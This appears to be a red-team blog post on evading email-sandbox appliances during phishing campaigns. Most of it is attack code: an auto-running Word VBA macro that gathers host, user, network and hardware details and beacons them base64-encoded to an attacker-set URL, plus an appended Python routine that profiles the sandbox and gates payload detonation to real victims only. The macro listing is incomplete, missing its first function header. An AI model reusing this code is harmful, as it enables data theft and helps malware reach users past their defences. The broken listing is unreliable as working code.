I decided to mix things up a little and write about something other than the usual vulnerability research or CTF write-ups. The bulk of our day job is long-term external assessments of customer networks, so I thought a post on some hurdles we have had to overcome recently around phishing might be useful to others.
In our experience, phishing is responsible for somewhere around 80% of initial network access from external sources. Much of this comes down to poor user security-awareness training, plus a handful of other debatable reasons. To try to solve the problem of click-happy users, IT administrators have begun deploying appliances that sandbox incoming email: attachments containing macros are detonated in an isolated environment and watched for malicious activity before the message is delivered. These devices have become quite effective at stopping suspicious emails from ever reaching users.
Anyone who has worked in security for any significant amount of time will tell you that offensive and defensive techniques evolve directly in response to each other. In our scenario, the offensive tactic was emailing users macro-laden documents. In response, defensive tools were developed to sandbox these emails and identify malicious activity. The natural next step is offensive techniques that render the sandbox useless.
Our team had reasonable success bypassing these devices using tricks borrowed from modern malware, such as the evasion technique described at https://threatpost.com/malware-evades-detection-with-novel-technique/120787/ and the processor-core counting used by the Dyre banking trojan (http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes). Realizing that this problem was only going to become more prevalent, we decided to take the idea behind those techniques one step further.
We chose to exploit the function of these devices to bypass them. Since they are designed to execute any code passed to them, we targeted the sandbox hardware itself. We picked an arbitrary email address in the target domain, constructed a blatant phishing email of the kind the target would see often, and attached a macro that performs extensive enumeration of whatever system runs it: processor core count, Word's recent-file count, hostname, username, domain and logon server, MAC and IP addresses of the physical adapters, and the hardware manufacturer and model. The macro base64-encodes this data and sends it to an attacker-controlled server in the URL of an HTTP request. With the results in hand, we can build a second macro that only runs its payload on systems that do not match the fingerprint we received from the email sandbox. Since individual fields such as addresses or hostnames can differ from one sandbox run to the next, the test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.
retStr = ""
strComputer = "."
strQuery = "SELECT * FROM Win32_ComputerSystem"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)
For Each objItem In colItems
retStr = objItem.Manufacturer
retStr = retStr & "|" & objItem.Model
Next
MakeModel = retStr
End Function
Function EnvironVars()
sHostname = Environ("computername") & "|" & Environ("username") & _
"|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
EnvironVars = sHostname
End Function
Function RecentFiles()
Set wdApp = ActiveDocument.Application
RecentFiles = wdApp.RecentFiles.Count
End Function
Function GetCores()
Dim objWMIService, cores, Proc, strQuery
strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
Set cores = objWMI.ExecQuery(strQuery, , 48)
Set GetCores = cores
End Function
Function GetNetwork()
retStr = ""
strComputer = "."
strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)
Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")
For Each objItem In colItems
strMacAddress = objItem.MACAddress
sysName = objItem.SystemName
For Each ipItem In ipItems
If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
Exit For
End If
Next
Next
GetNetwork = retStr
End Function
Private Function Enc(ByVal strData As String) As Byte()
Dim arrData() As Byte
arrData = StrConv(strData, vbFromUnicode)
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")
objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.nodeTypedValue = arrData
Enc = objDocElem.Text
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function Dec(ByVal strData As String) As Byte()
Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")
objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.Text = strData
Dec = objDocElem.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Sub DoStuff(ByVal strData As String)
Dim IE As Object
Dim strBaseURL As String
Dim pre As String
address = "http://127.0.0.1/"
‘strBaseURL = StrConv(Dec(address), 64)
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = False
IE.navigate address & strData
On Error GoTo ErrorHandler
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
If Not IsNull(doc.getElementById("overridelink")) Then
Set lnkOverRide = doc.getElementById("overridelink")
If Not lnkOverRide Is Nothing Then
lnkOverRide.Click
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Else
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Dim testString As String
testString = IE.Document.body.innerText
IE.Stop
IE.Quit
ErrorHandler:
Exit Sub
End Sub
Sub AutoOpen()
Dim retStr As String
Set cores = GetCores
Length = 0
For Each i In cores
Length = Length + 1
Next
retStr = Str(Length – 1)
retStr = retStr & "|" & RecentFiles
retStr = retStr & "|" & EnvironVars
retStr = retStr & "|" & GetNetwork
retStr = retStr & "|" & MakeModel
retStr = Enc(retStr)
DoStuff (retStr)
End Sub[/sourcecode]
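The post does not show the receiving side, so the following is an added example (not code from the original post or its authors) of the attacker-side logic: it decodes a beacon in the format the macro above produces, accumulates what the sandbox reports across repeated test emails, and decides whether a later fingerprint belongs to the sandbox. The same comparison, expressed as a handful of If statements in VBA, is the gate the second-stage macro carries. It goes slightly beyond the text by matching only on fields that stay stable between runs and by treating a reused hostname as a sandbox tell. The sample beacons, hostnames, vendor strings and addresses are constructed for the example, not captured from any appliance.

```python
import base64
from dataclasses import dataclass

# Record layout written by the macro's AutoOpen before base64 encoding
# (each part after Str(cores) is appended with a leading "|"):
#   cores|recentfiles|computername|username|userdomain|logonserver|<mac|ip|>*|manufacturer|model
# GetNetwork emits "mac|ip|" per adapter, so the adapter section carries its own
# trailing separator and the record is parsed from both ends, not by fixed index.


@dataclass(frozen=True)
class Fingerprint:
    cores: int
    recent_files: int
    computername: str
    username: str
    userdomain: str
    logonserver: str
    adapters: tuple        # ((mac, ip), ...)
    manufacturer: str
    model: str

    def stable_key(self):
        """Fields a sandbox tends to keep constant between detonations.
        MAC/IP and hostname are left out on purpose: they may be randomised
        per run, and a real victim never shares them with the appliance."""
        return (self.manufacturer.lower(), self.model.lower(),
                self.cores, self.recent_files, self.username.lower())


def parse_beacon(encoded: str) -> Fingerprint:
    """Decode one beacon as it arrives in the request URL."""
    # StrConv(..., vbFromUnicode) in the macro produces ANSI (cp1252) bytes.
    raw = base64.b64decode(encoded).decode("cp1252")
    parts = raw.split("|")
    if len(parts) < 8:
        raise ValueError("truncated beacon: %r" % raw)
    # VBA's Str() prefixes non-negative numbers with a space; strip before int().
    cores = int(parts[0].strip())
    recent = int(parts[1].strip())
    computername, username, userdomain, logonserver = parts[2:6]
    manufacturer, model = parts[-2], parts[-1]
    net = parts[6:-2]
    if net and net[-1] == "":      # trailing "|" from GetNetwork, or no adapters at all
        net = net[:-1]
    if len(net) % 2:
        raise ValueError("odd adapter field count: %r" % net)
    adapters = tuple(zip(net[0::2], net[1::2]))
    return Fingerprint(cores, recent, computername, username, userdomain,
                       logonserver, adapters, manufacturer, model)


class SandboxProfile:
    """Everything the sandbox has reported so far. Feeding it one beacon per
    test email captures the variation the appliance shows between runs."""

    def __init__(self):
        self.keys = set()
        self.hostnames = set()

    def add(self, fp: Fingerprint) -> None:
        self.keys.add(fp.stable_key())
        self.hostnames.add(fp.computername.lower())

    def looks_like_sandbox(self, fp: Fingerprint) -> bool:
        if fp.stable_key() in self.keys:
            return True
        # Stable fields drifted but the hostname was reused: still the appliance.
        return fp.computername.lower() in self.hostnames


def build_profile(beacons) -> SandboxProfile:
    profile = SandboxProfile()
    for b in beacons:
        profile.add(parse_beacon(b))
    return profile


def should_detonate(fp: Fingerprint, profile: SandboxProfile) -> bool:
    """The gate the final macro implements: run only where the fingerprint does NOT match."""
    return not profile.looks_like_sandbox(fp)


def encode_record(record: str) -> str:
    """Mirror of the macro's Enc(): ANSI bytes, then base64 (used to build samples)."""
    return base64.b64encode(record.encode("cp1252")).decode("ascii")


# Constructed sample beacons (hypothetical values, not captured from any real appliance).
SANDBOX_BEACONS = [
    encode_record(" 1|0|WIN-SBX01|admin|WIN-SBX01|\\\\WIN-SBX01|00:0C:29:AA:BB:CC|10.0.2.15||VMware, Inc.|VMware Virtual Platform"),
    # second detonation of the same image: new MAC and IP, everything else unchanged
    encode_record(" 1|0|WIN-SBX01|admin|WIN-SBX01|\\\\WIN-SBX01|00:0C:29:DD:EE:FF|10.0.2.16||VMware, Inc.|VMware Virtual Platform"),
]
VICTIM_BEACON = encode_record(" 4|12|LT-JSMITH|jsmith|CORP|\\\\DC01|A4:5E:60:12:34:56|192.168.10.42||Dell Inc.|Latitude 7490")

if __name__ == "__main__":
    profile = build_profile(SANDBOX_BEACONS)
    for label, beacon in (("sandbox", SANDBOX_BEACONS[0]), ("victim", VICTIM_BEACON)):
        fp = parse_beacon(beacon)
        print(label, fp.manufacturer, fp.model, "detonate:", should_detonate(fp, profile))
```

The stable key deliberately ignores anything the appliance might randomise, and the hostname set catches the opposite case where the image changes but the machine name does not; both sets grow with every repeated probe, which is why the text recommends sending more than one.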